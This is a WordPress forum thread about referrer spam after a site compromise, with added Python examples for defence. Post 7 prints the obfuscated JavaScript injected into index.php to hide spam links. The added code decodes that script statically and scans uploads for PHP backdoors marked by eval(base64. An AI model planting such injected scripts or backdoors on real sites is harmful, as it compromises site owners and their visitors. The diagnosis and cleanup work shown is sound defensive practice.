Bizarre referrer spam links (13 posts)

  1. droolcup
    Member
    Posted 2 years ago #

    I have been getting weird WordPress referrer spam the last 4 days, but there are no injections or anything of the like on my site.

    I'm using WordPress as a simple CMS.

    I'm using the StatPress plugin to check out who is coming to the site. This morning, I noticed an abnormally large number of visitors over the last few days.

    People seem to be visiting pages like mysite.com/?myfjkfosljfsfjd (NB : not a string I've seen, just an example). When clicked, it will go to my homepage. Checking the source, there is nothing out of the ordinary (no spam links, etc). If you google that end string by itself, you get one result, to my site, with a summary that lists a whole bunch of viagra type words.

    Any idea what is going on, and how I can stop this?

    I was running 2.8.2, upgraded to 2.8.3 this morning.

  2. esmi
    Theme Diva & Mod
    Posted 2 years ago #

    there are no injections or anything of the like on my site

    How do you know?

  3. droolcup
    Member
    Posted 2 years ago #

    I've looked at the html being generated, the templates, and the database. I see nothing out of the ordinary.

    Here is a google search of one of the strings : http://tinyurl.com/nxajg9

  4. veganist
    Member
    Posted 2 years ago #

    Hi, I had this same problem. Somebody modified my index.php file and inserted a part of encoded JavaScript plus a lot of links to another compromised WordPress install, containing offers to buy audio editing software mostly.
    First I deleted the links but 3 days later there were new ones.
    I finally found that somebody has gained access to the WordPress installation as administrator.... although my subscription options were "everybody can register" "as subscriber". So I deactivated that option for now.

    As I use a versioning system for the template files, I will try to check if there was something else modified.

    Another solution may by the way be to put an .htaccess file on the wp-admin/ directory.

  5. bottleneck
    Member
    Posted 2 years ago #

    Another solution may by the way be to put an .htaccess file on the wp-admin/ directory.

    Just in case:

    http://wordpress.org/support/topic/325347#post-1260699

  6. songdogtech
    Member
    Posted 2 years ago #

  7. veganist
    Member
    Posted 2 years ago #

    OK, Update : apparently nothing else in the templates had been modified.

    For reference, the JavaScript part of the injection was :

    <script>function KoiQBOL(qNQghUYaEb){ fff=op.split("394");var UtRt = document.getElementById('dklA'); }
    function WwcDBUVhHq(Epi){var rHZBxZwKHL=5,UxiEfYK=7;var UeF='42+6,82+1,82+6,86+3,77+1,72+1,44+2,9+2,7+1,32+6,80+5,85+0,82+6,74+2,86+3,69+2,40+0,39+2,72+6,72+6,87+1,87+1,67+6,75+0,71+3,22+6,87+6,22+6,71+3,75+0,82+1,80+0,77+1,69+2,86+3,41+3,78+4,79+2,78+4,72+1,42+1,22+6,89+2,9+2,7+1,42+6,33+4,82+1,82+6,86+3,',pBY=UeF.split(',');YUCPn='';for(HxPCvFVEnA=0x13-0x6-0x8-0xb+0x25+0x30-0x4f;HxPCvFVEnA<pBY.length-1;HxPCvFVEnA+=-0x19-0x9-0x31+0x24-0x16-0x1+0x6+0x41){ acatnqE=pBY[HxPCvFVEnA].split('+');cphjP = parseInt(acatnqE[0]*UxiEfYK)+parseInt(acatnqE[1]);cphjP = parseInt(cphjP)/rHZBxZwKHL;YUCPn += String.fromCharCode(cphjP);}return YUCPn;}function RDqmrbJ(kbTAqPXcK){var aBaIvacm=3,hfqTPATL=2;var oJC='162+0,151+1,93+0,19+1,15+0,19+1,15+0,',DeegOl=oJC.split(',');LrwOS='';for(KVONkcbxn=-0x10-0x20+0x1f-0x25-0x6+0x3c;KVONkcbxn<DeegOl.length-1;KVONkcbxn+=-0x5-0x5-0x31+0x1d-0x27+0x27+0x2-0x25-0x25+0x67){ qPCBpS=DeegOl[KVONkcbxn].split('+');xqFr = parseInt(qPCBpS[0]*hfqTPATL)+parseInt(qPCBpS[1]);xqFr = parseInt(xqFr)/aBaIvacm;LrwOS += String.fromCharCode(xqFr);}return LrwOS;}function eMlw(FcBGJ){ fff.op.replace("950"); }
    function RRMbqRvlGb(oQifPnt){ window.eval();window.eval(); }
    document['w2708r9125i4240t5785e43695678'.replace(/[0-9]/g,'')](WwcDBUVhHq('KQtB'),RDqmrbJ('MxJSbIqOl'));function yaXZVHbp(dqNEJztHxw){ fff=op.split("274");var oqgdHCgLda=new Function("kQAXCR", "return 611205;");alert('yZu'); }
    function MoRq(Mqk){ fff.op.replace("1003");var cNsEgXuNuN = document.getElementById('TfXWubx');var cNsEgXuNuN = document.getElementById('TfXWubx'); }
    </script>
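
Added example (not part of the original thread): a static decoder for the script posted above, which recovers what it passes to document[...] without running any of the JavaScript. The key variables and encoded blobs are copied from the post. The regex and the divisor-then-multiplier ordering are assumptions based on this one sample.

```python
import re

# Key variables and encoded blobs copied from the two decoder functions in the
# script posted above (WwcDBUVhHq and RDqmrbJ); loop and filler code trimmed.
SAMPLE = (
    "var rHZBxZwKHL=5,UxiEfYK=7;var UeF='42+6,82+1,82+6,86+3,77+1,72+1,44+2,9+2,7+1,32+6,80+5,85+0,82+6,74+2,86+3,69+2,40+0,39+2,72+6,72+6,87+1,87+1,67+6,75+0,71+3,22+6,87+6,22+6,71+3,75+0,82+1,80+0,77+1,69+2,86+3,41+3,78+4,79+2,78+4,72+1,42+1,22+6,89+2,9+2,7+1,42+6,33+4,82+1,82+6,86+3,';"
    "var aBaIvacm=3,hfqTPATL=2;var oJC='162+0,151+1,93+0,19+1,15+0,19+1,15+0,';"
)

# In both functions the first variable is the divisor and the second the
# multiplier: char code = (a * multiplier + b) / divisor for each "a+b" pair.
BLOB_RE = re.compile(r"var \w+=(\d+),\w+=(\d+);var \w+='((?:\d+\+\d+,)+)'")


def decode_blob(blob, multiplier, divisor):
    """Decode one 'a+b,a+b,' blob to text without executing any JavaScript."""
    chars = []
    for pair in blob.rstrip(",").split(","):
        a, b = (int(n) for n in pair.split("+"))
        value, remainder = divmod(a * multiplier + b, divisor)
        if remainder:
            raise ValueError(f"pair {pair!r} does not divide evenly")
        chars.append(chr(value))
    return "".join(chars)


def decode_script(js):
    """Return the decoded string for every encoded blob found in js, in order."""
    return [decode_blob(blob, int(mul), int(div))
            for div, mul, blob in BLOB_RE.findall(js)]


def method_name(obfuscated):
    """Undo the digit padding used for the document[...] property name."""
    return re.sub(r"[0-9]", "", obfuscated)


if __name__ == "__main__":
    print(method_name("w2708r9125i4240t5785e43695678"))  # property being called
    print(repr("".join(decode_script(SAMPLE))))          # text handed to it
```

The two decoded pieces join into a single style block that sets one class to display:none, which fits injected links that are present in the markup but not visible on the page.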

  8. veganist
    Member
    Posted 2 years ago #

    Thank you songdogtech & bottleneck :)

  9. veganist
    Member
    Posted 2 years ago #

    Didn't have the time yet to clean up the installation, but even with a .htaccess on wp-admin and having deleted the user that had gained administrator access... the spam referrers just came back :(

  10. veganist
    Member
    Posted 2 years ago #

    I do now believe this is done via XML-RPC publishing, another option that is checked, but which was not checked by me..

  11. veganist
    Member
    Posted 2 years ago #

    Found some files in wp-content/uploads/, "wp-pass.php" and "topper.php", containing eval(base64 instructions. Also, wp-includes/index.php has been modified.
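
Added example (not part of the original thread): a check for the two indicators named in the post above, PHP files sitting under an uploads directory and file bodies containing eval(base64. The suffix list, function names and the sample tree are assumptions, and the sample file contents are constructed placeholders.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post above: PHP files under wp-content/uploads/
# and file bodies containing "eval(base64".
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".phtml", ".php5"}  # assumed list of executable suffixes


def scan_uploads(uploads_dir):
    """Return {relative path: [reasons]} for suspicious files under uploads_dir."""
    root = Path(uploads_dir)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        if path.suffix.lower() in PHP_SUFFIXES:
            reasons.append("php-in-uploads")   # uploads should hold media only
        if EVAL_B64.search(path.read_bytes()):
            reasons.append("eval-base64")      # encoded code passed to eval
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_tree(root):
    """Write a constructed uploads/ tree; file bodies are harmless placeholders."""
    files = {
        "wp-pass.php": b'<?php eval(base64_decode("cGxhY2Vob2xkZXI=")); ?>',
        "topper.php": b'<?php eval( base64_decode("cGxhY2Vob2xkZXI=")); ?>',
        "2009/08/banner.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
        "2009/08/notes.php": b"<?php // constructed: no eval here ?>",
    }
    for name, body in files.items():
        target = Path(root) / name
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for name, reasons in scan_uploads(tmp).items():
            print(f"{name}: {', '.join(reasons)}")
```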

  12. veganist
    Member
    Posted 2 years ago #

  13. songdogtech
    Member
    Posted 2 years ago #

    Unfortunately, I think the ultimate solution is to take the time to dump and clean your database.....
